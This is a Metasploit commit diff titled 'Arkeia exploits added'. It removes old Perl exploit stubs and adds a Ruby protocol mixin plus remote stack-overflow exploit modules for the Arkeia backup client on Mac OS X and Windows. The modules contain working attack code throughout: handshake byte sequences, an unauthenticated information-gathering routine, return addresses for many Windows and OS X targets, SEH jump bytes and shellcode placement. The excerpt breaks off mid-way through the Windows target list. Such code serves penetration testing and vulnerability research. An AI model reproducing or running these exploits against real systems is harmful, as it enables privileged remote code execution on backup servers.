Arkeia exploits added
git-svn-id: file:///home/svn/incoming/trunk@3129 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a990e20067
commit
40aa62968f
|
@ -1,238 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Mac OS X platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3 and has been tested
|
||||
with Arkeia 5.3.1 on Mac OS X 10.3.5.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '14011'],
|
||||
[ 'BID', '12594'],
|
||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
[ 'MIL', '6'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 700,
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::arkeia_type77_macos;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
use Pex::Arkeia;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
|
||||
'Arch' => [ 'ppc' ],
|
||||
'OS' => [ 'osx'],
|
||||
'Priv' => 1,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 617],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 700,
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Mac OS X platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3 and has been tested
|
||||
with Arkeia 5.3.1 on Mac OS X 10.3.5.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '14011'],
|
||||
['BID', '12594'],
|
||||
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
['MIL', '6'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['Arkeia 5.3.1 Stack Return (boot)', 0xbffff910 ],
|
||||
],
|
||||
|
||||
'Keys' => ['arkeia'],
|
||||
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
|
||||
my %info = Pex::Arkeia::ClientInfo($s);
|
||||
|
||||
# Give up if we did not get a version response back
|
||||
if (! $info{'Version'} ) {
|
||||
$self->PrintLine("[*] Error: ". $info{'Error'});
|
||||
return $self->CheckCode('Unknown');
|
||||
}
|
||||
|
||||
# Dump out the information returned by the server
|
||||
$self->PrintLine("[*] System Information");
|
||||
foreach my $inf (keys %info) {
|
||||
next if $inf eq 'Error';
|
||||
$self->PrintLine(" $inf: $info{$inf}");
|
||||
}
|
||||
|
||||
# Throw a warning if they are using the wrong exploit
|
||||
if ($info{'System'} !~ /Darwin/i) {
|
||||
$self->PrintLine("[*] This module is not able to exploit the ".$info{'System'}." platform");
|
||||
}
|
||||
|
||||
# We are going to assume that they will fix this in the next release
|
||||
if ($info{'Version'} =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) {
|
||||
$self->PrintLine("[*] This system appears to be vulnerable");
|
||||
return $self->CheckCode('Confirmed');
|
||||
}
|
||||
|
||||
# This is more than likely not vulnerable...
|
||||
$self->PrintLine("[*] This version may not be vulnerable");
|
||||
|
||||
return $self->CheckCode('Safe');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $head = "\x00\x4d\x00\x03\x00\x01\xff\xff";
|
||||
|
||||
# Request has to be big enough to find and small enough
|
||||
# not to write off the end of the stack. If we write too
|
||||
# far down, we also smash env[], which causes a crash in
|
||||
# getenv() before our function returns.
|
||||
|
||||
my $poof = Pex::Text::EnglishText(1200);
|
||||
|
||||
# Configure the length value of the data in the packet header
|
||||
substr($head, 6, 2, pack('n', length($poof)));
|
||||
|
||||
# Return back to the stack either directly or via system lib
|
||||
substr($poof, 0, 112, pack('N', $target->[1]) x (112 / 4));
|
||||
|
||||
# Huge nop slep followed by the payload
|
||||
substr($poof, 112, length($shellcode), $shellcode);
|
||||
|
||||
|
||||
$self->PrintLine("[*] Sending " .length($poof) . " bytes to remote host.");
|
||||
$s->Send($head);
|
||||
$s->Send($poof);
|
||||
|
||||
# Wait a few seconds for the payload to pop...
|
||||
$s->Recv(-1, 10);
|
||||
|
||||
# Call the payload handler if one exists
|
||||
$self->Handler($s);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -1,280 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Windows platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '14011'],
|
||||
[ 'BID', '12594'],
|
||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
[ 'MIL', '7'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'win32',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::arkeia_type77_win32;
|
||||
use base "Msf::Exploit";
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
use Pex::Arkeia;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32'],
|
||||
'Priv' => 1,
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 617],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
'Keys' => ['+ws2ord'],
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Windows platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '14011'],
|
||||
['BID', '12594'],
|
||||
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
['MIL', '7'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['Arkeia 5.3.3 and 5.2.27 Windows (All)', 0x004130a2, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.2.27 and 5.1.19 Windows (All)', 0x00407b9c, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.3.3 and 5.0.19 Windows (All)', 0x0041d6b9, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.1.19 and 5.0.19 Windows (All)', 0x00423264, 5 ], # arkeiad.exe
|
||||
['Arkeia 5.x Windows 2000 English', 0x75022ac4, 5 ], # ws2help.dll
|
||||
['Arkeia 5.x Windows XP English SP0/SP1', 0x71aa32ad, 5 ], # ws2help.dll
|
||||
['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', 0x77681799, 5 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows 2000 English', 0x75022ac4, 4 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows XP English SP0/SP1', 0x71aa32ad, 4 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', 0x77681799, 4 ], # ws2help.dll
|
||||
['Arkeia 4.2 Windows 2000 German', 0x74fa1887, 4 ], # ws2help.dll
|
||||
],
|
||||
|
||||
'Keys' => ['arkeia'],
|
||||
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$self->PrintLine("[*] Querying the Arkeia Backup Client...");
|
||||
my %info = Pex::Arkeia::ClientInfo($s);
|
||||
|
||||
# Give up if we did not get a version response back
|
||||
if (! $info{'Version'} ) {
|
||||
$self->PrintLine("[*] Error: ". $info{'Error'});
|
||||
return $self->CheckCode('Unknown');
|
||||
}
|
||||
|
||||
# Dump out the information returned by the server
|
||||
$self->PrintLine("[*] System Information");
|
||||
foreach my $inf (keys %info) {
|
||||
next if $inf eq 'Error';
|
||||
$self->PrintLine(" $inf: $info{$inf}");
|
||||
}
|
||||
|
||||
# Throw a warning if they are using the wrong exploit
|
||||
if ($info{'System'} !~ /Windows/i) {
|
||||
$self->PrintLine("[*] This module is not able to exploit the ".$info{'System'}." platform");
|
||||
}
|
||||
|
||||
# We are going to assume that they will fix this in the next release
|
||||
if ($info{'Version'} =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) {
|
||||
$self->PrintLine("[*] This system appears to be vulnerable");
|
||||
return $self->CheckCode('Confirmed');
|
||||
}
|
||||
|
||||
# This is more than likely not vulnerable...
|
||||
$self->PrintLine("[*] This version may not be vulnerable");
|
||||
|
||||
return $self->CheckCode('Safe');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $target_idx = $self->GetVar('TARGET');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
my $target = $self->Targets->[$target_idx];
|
||||
|
||||
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
);
|
||||
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $head = "\x00\x4d\x00\x03\x00\x01\xff\xff";
|
||||
my $data;
|
||||
|
||||
if ($target->[2] == 5) {
|
||||
$data = $self->Arkeia5($target->[1], $shellcode);
|
||||
}
|
||||
|
||||
if ($target->[2] == 4) {
|
||||
$data = $self->Arkeia4($target->[1], $shellcode);
|
||||
}
|
||||
|
||||
# Configure the length value of the data in the packet header
|
||||
substr($head, 6, 2, pack('n', length($data)));
|
||||
|
||||
$self->PrintLine("[*] Sending " .length($data) . " bytes to remote host.");
|
||||
$s->Send($head);
|
||||
$s->Send($data);
|
||||
|
||||
# Takes a few seconds for the payload to pop (multiple exceptions)
|
||||
$s->Recv(-1, 10);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
sub Arkeia5 {
|
||||
my $self = shift;
|
||||
my $addr = shift;
|
||||
my $code = shift;
|
||||
my $poof = Pex::Text::EnglishText(4096);
|
||||
|
||||
# The return address is a pop/pop/ret in the executable or system lib
|
||||
substr($poof, 1176, 4, pack('V', $addr));
|
||||
|
||||
# The pop/pop/ret takes us here, jump back five bytes
|
||||
substr($poof, 1172, 2, "\xeb\xf9");
|
||||
|
||||
# Jump all the way back to our shellcode
|
||||
substr($poof, 1167, 5, "\xe9".pack('V', -1172));
|
||||
|
||||
# Place our shellcode in the beginning of the request
|
||||
substr($poof, 0, length($code), $code);
|
||||
|
||||
return $poof;
|
||||
}
|
||||
|
||||
sub Arkeia4 {
|
||||
my $self = shift;
|
||||
my $addr = shift;
|
||||
my $code = shift;
|
||||
my $poof = Pex::Text::EnglishText(4096);
|
||||
|
||||
# The return address is a pop/pop/ret in the executable or system lib
|
||||
substr($poof, 100, 4, pack('V', $addr));
|
||||
|
||||
# The pop/pop/ret takes us here, jump over the return address
|
||||
substr($poof, 96, 2, "\xeb\x06");
|
||||
|
||||
# Place our shellcode in the beginning of the request
|
||||
substr($poof, 104, length($code), $code);
|
||||
|
||||
return $poof;
|
||||
}
|
||||
|
||||
|
||||
1;
|
||||
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -212,7 +212,8 @@ class Exploit < Msf::Module
|
|||
require 'msf/core/exploit/http'
|
||||
require 'msf/core/exploit/dcerpc'
|
||||
require 'msf/core/exploit/mssql'
|
||||
|
||||
require 'msf/core/exploit/arkeia'
|
||||
|
||||
#
|
||||
# Creates an instance of the exploit module. Mad skillz.
|
||||
#
|
||||
|
|
|
@ -0,0 +1,206 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This module exposes methods for manipulating the Arkeia backup service
|
||||
#
|
||||
###
|
||||
module Exploit::Remote::Arkeia
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
#
|
||||
# Creates an instance of a MSSQL exploit module.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
# Register the options that all FTP exploits may make use of.
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(617),
|
||||
], Msf::Exploit::Remote::Arkeia)
|
||||
|
||||
self.recv_buff = ''
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# This method dumps some information about the service
|
||||
#
|
||||
def arkeia_info
|
||||
connect
|
||||
|
||||
info = { }
|
||||
resp = ''
|
||||
|
||||
# Authenticate1
|
||||
req = "\x00\x41\x00\x00\x00\x00\x00\x73"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x7f\x00\x00\x01"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x01\x00\x00\x7f\x41\x52\x4b\x41"+
|
||||
"\x44\x4d\x49\x4e\x00\x72\x6f\x6f"+
|
||||
"\x74\x00\x72\x6f\x6f\x74\x00\x00"+
|
||||
"\x00\x34\x2e\x33\x2e\x30\x2d\x31"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00"
|
||||
|
||||
sock.put(req)
|
||||
resp = arkeia_recv()
|
||||
if (not (resp and resp[0,4] == "\x00\x60\x00\x04"))
|
||||
disconnect
|
||||
return false
|
||||
end
|
||||
|
||||
# Authenticate2
|
||||
req = "\x00\x73\x00\x00\x00\x00\x00\x0c" +
|
||||
"\x32\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\x00\x00\x00"
|
||||
|
||||
sock.put(req)
|
||||
resp = arkeia_recv()
|
||||
if (not (resp and resp[0,4] == "\x00\x60\x00\x04"))
|
||||
disconnect
|
||||
return false
|
||||
end
|
||||
|
||||
# SessionSetup1
|
||||
req = "\x00\x61\x00\x04\x00\x01\x00\x15"+
|
||||
"\x00\x00\x31\x35\x33\x39\x38\x00"+
|
||||
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00"
|
||||
|
||||
sock.put(req)
|
||||
resp = arkeia_recv()
|
||||
if (not (resp and resp[0,4] == "\x00\x43\x00\x00"))
|
||||
disconnect
|
||||
return false
|
||||
end
|
||||
|
||||
# Begin the ARKADMIN_GET_CLIENT_INFO request
|
||||
req = "\x00\x62\x00\x01\x00\x02\x00\x25"+
|
||||
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
|
||||
"\x5f\x47\x45\x54\x5f\x43\x4c\x49"+
|
||||
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
|
||||
"\x00\x32\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00"
|
||||
|
||||
sock.put(req)
|
||||
resp = arkeia_recv()
|
||||
if (not (resp and resp[0,4] == "\x00\x43\x00\x00"))
|
||||
disconnect
|
||||
return false
|
||||
end
|
||||
|
||||
# Complete the ARKADMIN_GET_CLIENT_INFO request
|
||||
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
"\x30\x00\x31\x00\x32\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00"
|
||||
|
||||
sock.put(req)
|
||||
1.upto(5) { |i|
|
||||
resp = arkeia_recv()
|
||||
break if not resp
|
||||
break if resp =~ /VERSION/
|
||||
}
|
||||
|
||||
if (not (resp and resp =~ /VERSION/))
|
||||
disconnect
|
||||
return false
|
||||
end
|
||||
|
||||
# Store the version information
|
||||
mver = resp.match(/IVERSION\x00([^\x00]+)/)
|
||||
info['Version'] = mver[1] if mver
|
||||
|
||||
# Store the hostname information
|
||||
mver = resp.match(/ISERVNAME\x00([^\x00]+)/)
|
||||
info['Hostname'] = mver[1] if mver
|
||||
|
||||
# Begin the ARKADMIN_GET_MACHINE_INFO request
|
||||
req = "\x00\x62\x00\x01\x00\x02\x00\x26"+
|
||||
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
|
||||
"\x5f\x47\x45\x54\x5f\x4d\x41\x43"+
|
||||
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
|
||||
"\x4f\x00\x33\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00"
|
||||
|
||||
sock.put(req)
|
||||
1.upto(5) { |i|
|
||||
resp = arkeia_recv()
|
||||
break if not resp
|
||||
break if resp[0,2] == "\x00\x43"
|
||||
}
|
||||
if (not (resp and resp[0,2] == "\x00\x43"))
|
||||
disconnect
|
||||
return info
|
||||
end
|
||||
|
||||
# Complete the ARKADMIN_GET_MACHINE_INFO request
|
||||
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
|
||||
"\x30\x00\x31\x00\x33\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00"
|
||||
|
||||
sock.put(req)
|
||||
1.upto(5) { |i|
|
||||
resp = arkeia_recv()
|
||||
break if not (resp and resp.length > 0)
|
||||
break if resp[0,2] == "\x00\x69"
|
||||
}
|
||||
if (not (resp and resp[0,2] == "\x00\x69"))
|
||||
disconnect
|
||||
return info
|
||||
end
|
||||
|
||||
# Finally, parse out and store all the parameters
|
||||
resp.split("TPVALUE\x00").each { |x|
|
||||
minf = x.match(/^([^\x00]+)\x00PNAME\x00([^\x00]+)/)
|
||||
if (minf)
|
||||
info[ minf[2] ] = minf[1]
|
||||
end
|
||||
}
|
||||
|
||||
disconnect
|
||||
return info
|
||||
end
|
||||
|
||||
#
|
||||
# This method reads from the socket and parses out a single
|
||||
# arkeia response, buffering the rest
|
||||
#
|
||||
def arkeia_recv(nsock = self.sock)
|
||||
if (self.recv_buff.length < 8)
|
||||
self.recv_buff << (sock.get_once || '')
|
||||
end
|
||||
|
||||
if (self.recv_buff.length < 8)
|
||||
return false
|
||||
end
|
||||
|
||||
# Read the length header out of the message
|
||||
dlen = self.recv_buff[6, 2].unpack('n')[0]
|
||||
|
||||
# Do we have the entire response message?
|
||||
if (self.recv_buff.length >= dlen + 8)
|
||||
return self.recv_buff.slice!(0, dlen + 8)
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
attr_accessor :recv_buff
|
||||
end
|
||||
end
|
|
@ -0,0 +1,106 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Arkeia
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Mac OS X platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3 and has been tested
|
||||
with Arkeia 5.3.1 on Mac OS X 10.3.5.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '14011'],
|
||||
[ 'BID', '12594'],
|
||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
[ 'MIL', '6'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 700,
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Arkeia 5.3.1 Stack Return (boot)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_PPC,
|
||||
'Ret' => 0xbffff910,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
info = arkeia_info()
|
||||
if(not (info and info['Version']))
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
print_status("Arkeia Server Information:")
|
||||
info.each_pair { |k,v|
|
||||
print_status(" #{k + (" " * (30-k.length))} = #{v}")
|
||||
}
|
||||
|
||||
if (info['System'] !~ /Darwin/)
|
||||
print_status("This module only supports Mac OS X targets")
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
# Request has to be big enough to find and small enough
|
||||
# not to write off the end of the stack. If we write too
|
||||
# far down, we also smash env[], which causes a crash in
|
||||
# getenv() before our function returns.
|
||||
|
||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
||||
buf = Rex::Text.rand_text_english(1200, payload_badchars)
|
||||
|
||||
# Return back to the stack either directly or via system lib
|
||||
buf[0, 112] = [target.ret].pack('N') * (112/4)
|
||||
|
||||
# Huge nop slep followed by the payload
|
||||
buf[112, payload.encoded.length] = payload.encoded
|
||||
|
||||
head[6, 2] = [buf.length].pack('n')
|
||||
|
||||
begin
|
||||
sock.put(head)
|
||||
sock.put(buf)
|
||||
sock.get_once
|
||||
rescue IOError, EOFError => e
|
||||
print_status("Exception: #{e.class}:#{e.to_s}")
|
||||
end
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,114 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Arkeia
|
||||
include Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Arkeia backup
|
||||
client for the Windows platform. This vulnerability affects
|
||||
all versions up to and including 5.3.3.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '14011'],
|
||||
[ 'BID', '12594'],
|
||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
||||
[ 'MIL', '7'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe
|
||||
['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe
|
||||
['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe
|
||||
['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe
|
||||
['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll
